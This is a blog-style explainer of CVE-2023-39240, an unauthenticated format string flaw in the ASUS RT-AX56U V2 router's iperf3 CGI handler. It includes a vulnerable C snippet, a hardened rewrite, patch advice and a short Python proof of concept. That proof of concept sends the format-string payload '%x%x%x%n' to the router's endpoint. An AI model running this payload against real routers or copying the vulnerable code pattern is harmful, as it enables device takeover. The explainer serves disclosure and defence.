
The ASUS RT-AX56U V2 is a popular dual-band Wi-Fi 6 router used in many homes and offices. In August 2023, security researchers discovered a dangerous format string vulnerability in its firmware, specifically in the iperf client function API reached through the set_iperf3_cli.cgi module. Tracked as CVE-2023-39240, this bug lets *anyone on the network* (or worse, sometimes even anyone on the internet) run code on your router without a password.

This post breaks down the vulnerability, shows you code snippets, gives you direct links to references, and even walks through how it can be exploited.

What is the Vulnerability?

The trouble starts with the way the router accepts commands through its web interface (CGI scripts). The device supports running the popular iperf3 speed test over the network. The backend CGI handler, set_iperf3_cli.cgi, is supposed to process the user-supplied command safely, *but it doesn't*.

In short: the module does not properly validate or sanitize a certain input parameter. When formatting data, it unwittingly lets user input control the format string, a classic “format string” vulnerability.

This is very dangerous because, with enough skill, an attacker can use it to read memory, crash the process, or even execute arbitrary code.

Let’s look at the vulnerable code (simplified, based on firmware reverse engineering):

```c
#include <stdio.h>
#include <stdlib.h>

// Vulnerable function in set_iperf3_cli.cgi (simplified)
void handle_iperf_request(char *user_input) {
    char buffer[256];
    // BAD: user_input is passed as the format string itself, so any
    // %-directives it contains are interpreted by sprintf().
    sprintf(buffer, user_input);
    system(buffer);
}
```

In this snippet, user_input is used directly as the format string for sprintf(). That means a request carrying format directives (like %x %x %x %n) makes the function read values out of memory or write to memory, under the sender's control.
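For contrast, here is a hardened version of that handler. This is an added example, not code from the ASUS firmware: it rejects any parameter value containing characters outside a small allowlist (which excludes '%' and shell metacharacters) and only ever passes user data through a fixed "%s" directive. The "iperf3 -c %s" command template and the maximum length are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hardened handler (example code, not ASUS firmware). The parameter value
 * is assumed to be a plain token such as an address; the "iperf3 -c %s"
 * template is a guess at what the firmware builds. */

#define IPERF_PARAM_MAXLEN 64

/* Allowlist of characters a legitimate iperf3 value could need.
 * '%' (format directives) and ';', '|', '`', '$', quotes and whitespace
 * (shell metacharacters) are deliberately excluded. */
static int is_allowed_char(unsigned char c)
{
    return isalnum(c) || c == '.' || c == '-' || c == ':';
}

/* Returns 1 if value is safe to use, 0 if it must be rejected. */
int validate_iperf_param(const char *value)
{
    size_t len = strlen(value);
    if (len == 0 || len > IPERF_PARAM_MAXLEN)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (!is_allowed_char((unsigned char)value[i]))
            return 0;
    return 1;
}

/* Builds the command into out. Returns 1 on success, 0 on rejection or
 * truncation. The format string is a compile-time constant: user data only
 * ever fills the %s argument, so "%x%n" inside the value is inert. */
int build_iperf_command(const char *value, char *out, size_t outsz)
{
    if (!validate_iperf_param(value))
        return 0;
    int n = snprintf(out, outsz, "iperf3 -c %s", value);
    return n > 0 && (size_t)n < outsz;
}
```

With this shape, the request from the original bug report is refused before any formatting happens, and a value that would not fit the buffer is reported as an error instead of being truncated silently.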

1. No Login Needed!

The CGI endpoint is accessible *without authentication*. Anyone who can send a request to the router’s administration port can reach the API.

2. Exploiting With Format Strings

By sending crafted format directives (for example, /cgi-bin/set_iperf3_cli.cgi?client_enable=%x%x%x%n), an attacker can make the router disclose its own memory contents or even write a chosen value to a memory address.

A minimal version of the exploit HTTP call (Python):

```python
import requests

# The router's IP and the vulnerable endpoint
url = "http://192.168.50.1/cgi-bin/set_iperf3_cli.cgi?client_enable=%x%x%x%n"

# Send a GET request (no authentication needed)
response = requests.get(url)

print(response.text)  # Dumps some internal memory as hexadecimal numbers
```

With more careful construction (and knowing the target's memory layout), an attacker can go further: overwriting system pointers and gaining code execution or crashing the router.

- Remote Code Execution (RCE): Worst case, an attacker could take complete control of the device.
- Router Hijack or Brick: Change system settings, redirect DNS, replace firmware, or render the router unusable (DoS).
- Spy on Users: With full access, an attacker could monitor internet traffic or steal sensitive data.

How To Stay Safe

1. Upgrade Firmware: ASUS issued a fix after publication of the CVE. Download the latest firmware.

More Reading & References

- Official CVE: CVE-2023-39240 at NVD
- IoT Inspector Advisory: Full writeup and PoC (archived link)
- Firmware Download & Security Advisories: ASUS official support

Final Notes

Format string vulnerabilities like this are ancient, but still deadly. On a home router, this flaw is extra serious because the device sits at the edge of your network, protecting everything behind it. Don’t wait: patch your router, and check that you never expose the router's admin interface to wide networks.

If you want to learn more about these flaws, this old but gold guide explains how format string exploits work and why they’re so tricky for C programmers.

Stay safe!

*Want more router hacking breakdowns? Let us know what device you want covered next!*

Timeline

Published on: 09/07/2023 08:15:00 UTC
Last modified on: 09/12/2023 20:09:00 UTC